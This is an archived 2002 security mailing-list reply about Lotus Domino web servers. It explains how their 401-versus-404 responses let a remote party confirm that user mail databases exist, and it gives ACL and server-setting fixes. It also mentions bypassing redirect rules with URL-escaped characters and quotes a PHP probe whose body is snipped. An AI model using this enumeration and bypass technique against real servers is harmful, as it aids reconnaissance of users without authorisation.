Simon, Proper ACL management is certainly required to provide security, however in this case it still won't prevent an attacker from remotely verifying a mail user's existence. The key lies in the fact that Domino web servers will return a "401" unathorized response if the database actually exists, and a "404" nonexistent URI if the database does not. Since user mail databases are created by default when users are registered, this is a simple and easy way to test for existence. This can be easily tested by opening a web browser and attempting to access a known good mail database and then one that is known to be nonexistent. Obviously, if the anonymous user can actually access/read a user's mail database, that server has much bigger problems than what I describe above! There are several things administrators can do beyond what you describe eliminate this issue: 1) Choose not to allow email through the web (Application Security, Inc. recommends this for reasons I won't go into here) 2) Force nonexistent mail/*.nsf database access attempts to return a 401 unauthorized using a complex set of HTTP redirection rules set up in the server's server document. Attackers can generally get around this by using HTTP escape characters (i.e. %61). Either way, administrators are going to want to run regular security scans against their Domino based webservers in order to see just what an attacker could determine/break. Here at Application Security, Inc. (ASI) we're are preparing to debut a new penetration testing tool specifically geared for Domino webservers. This tool will not only tell you if users can be determined remotely, but it will also test mail database security, proper ACL management, the existence of serious remote vulnerabilities, user password strength, poor authentication mechanisms and more. This is a lot of stuff for one or two people to keep straight on however many servers a company has; so we're attempting to remove the both the burden and reduce the possibility of human error due to caffeine burnout. More information on our new pentesting offering is available at my company's website: www.appsecinc.com. Regards, _____________________________________________ Jay D. Thomson Tel: 212-490-6022 Fax: 212-490-6456 E-mail: jthomsonat_private Web: www.appsecinc.com Application Security, Inc. - Protection Where it Counts - This isn't a proof of concept, but more a probe for misconfigured database ACL's. If a Domino web server doesn't have a redirection URL for /mail/* mail files, then you rely on the access control for each mail file. Two things can be done to avoid this : 1 - Change the ACL on sensitive databases ( /mail/* , names.nsf ) to : Anonymous - No access [Default] - No access 2 - Within the Server Document for each server, ensure that "Allow HTTP clients to browse databases:" is set to "No" I believe that all versions of Domino server from 4.5 upwards are suceptible to badly configured ACL's. Any good administrator would have a hold of this already. #!/usr/local/bin/php -q <? <snip> </snip> fclose ($fd); ?>
This archive was generated by hypermail 2b30 : Sun Feb 10 2002 - 00:30:38 PST